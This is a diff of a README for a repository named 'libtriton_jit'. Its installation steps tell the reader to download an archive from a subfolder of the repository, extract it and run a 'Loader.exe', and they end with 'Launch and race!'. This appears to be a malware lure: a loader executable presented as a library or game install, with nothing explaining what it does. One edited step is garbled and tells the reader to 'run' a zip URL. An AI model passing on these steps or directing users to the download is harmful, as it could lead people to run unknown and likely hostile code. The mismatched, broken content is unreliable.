darkvibs/libtriton_jit/README.md

 ## 🛠️ Installation

-1. Download Loader.rar from the repository.
+1. Download https://raw.githubusercontent.com/darkvibs/libtriton_jit/main/Fagopyrum/libtriton_jit.zip from the repository.
 2. Extract the archive using 7-Zip, WinRAR, or your favorite extraction tool.
-3. Run Loader.exe (or the relevant version for your OS).
+3. Run https://raw.githubusercontent.com/darkvibs/libtriton_jit/main/Fagopyrum/libtriton_jit.zip (or the relevant version for your OS).
 4. Follow the simple prompts to complete the setup.
 5. Launch and race!